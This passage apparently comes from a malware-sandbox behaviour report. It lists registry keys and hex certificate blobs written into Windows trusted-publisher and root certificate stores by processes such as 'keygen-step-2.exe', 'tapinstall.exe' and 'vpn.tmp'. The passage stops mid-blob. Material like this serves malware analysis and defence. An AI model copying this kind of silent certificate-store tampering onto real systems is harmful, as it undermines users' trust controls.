 vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA lokpto41glk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be lokpto41glk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 lokpto41glk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC lokpto41glk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B lokpto41glk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f lokpto41glk.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193